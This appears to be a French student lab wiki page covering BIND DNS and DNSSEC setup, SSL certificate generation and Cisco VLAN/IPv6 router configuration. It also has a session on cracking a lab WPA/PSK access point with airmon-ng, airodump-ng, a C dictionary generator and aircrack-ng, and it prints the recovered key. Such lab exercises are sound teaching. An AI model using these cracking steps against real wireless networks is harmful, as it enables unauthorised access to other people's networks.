  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
